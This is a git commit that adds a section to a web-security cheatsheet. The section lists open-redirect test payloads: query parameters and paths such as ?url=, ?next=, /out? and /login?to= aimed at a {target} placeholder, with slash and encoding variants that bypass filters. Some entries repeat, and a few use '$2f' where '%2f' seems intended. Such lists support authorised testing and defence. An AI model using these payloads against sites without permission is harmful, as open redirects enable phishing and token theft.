Merge pull request #30 from 003random/patch-1

Update open-redirect.md
2024-11-21 18:53:01 +00:00 · 2018-01-19 11:32:59 +01:00 · 2018-01-19 11:32:59 +01:00 · ff4c146bd9
commit ff4c146bd9
parent 70c1e93d78 c60e6a2807
1 changed files with 132 additions and 0 deletions
--- a/cheatsheets/open-redirect.md
+++ b/cheatsheets/open-redirect.md
@ -24,7 +24,139 @@
 //google.com/%2f..
 ```

+## Possible open redirect parameters
+
+```
+?url=http://{target}
+```
+
+```
+?url=https://{target}
+```
+
+```
+?next=http://{target}
+```
+
+```
+?next=https://{target}
+```
+
+```
+?url=https://{target}
+```
+
+```
+?url=http://{target}
+```
+
+```
+?url=//{target}
+```
+
+```
+?url=$2f%2f{target}
+```
+
+```
+?next=//{target}
+```
+
+```
+?next=$2f%2f{target}
+```
+
+```
+?url=//{target}
+```
+
+```
+?url=$2f%2f{target}
+```
+
+```
+?url=//{target}
+```
+
+```
+/redirect/{target}
+```
+
+```
+/cgi-bin/redirect.cgi?{target}
+```
+
+```
+/out/{target}
+```
+
+```
+/out?{target}
+```
+
+```
+/out?/{target}
+```
+
+```
+/out?//{target}
+```
+
+```
+/out?/\{target}
+```
+
+```
+/out?///{target}
+```
+
+```
+?view={target}
+```
+
+```
+?view=/{target}
+```
+
+```
+?view=//{target}
+```
+
+```
+?view=/\{target}
+```
+
+```
+?view=///{target}
+```
+
+```
+/login?to={target}
+```
+
+```
+/login?to=/{target}
+```
+
+```
+/login?to=//{target}
+```
+
+```
+/login?to=/\{target}
+```
+
+```
+/login?to=///{target}
+```
+
+

 **Open Redirect Payloads** by @cujanovic

 https://github.com/cujanovic/Open-Redirect-Payloads
+
+
+**Open Redirect Paramters** by @fuzzdb-project
+
+https://github.com/fuzzdb-project/fuzzdb/blob/master/attack/redirect/redirect-urls-template.txt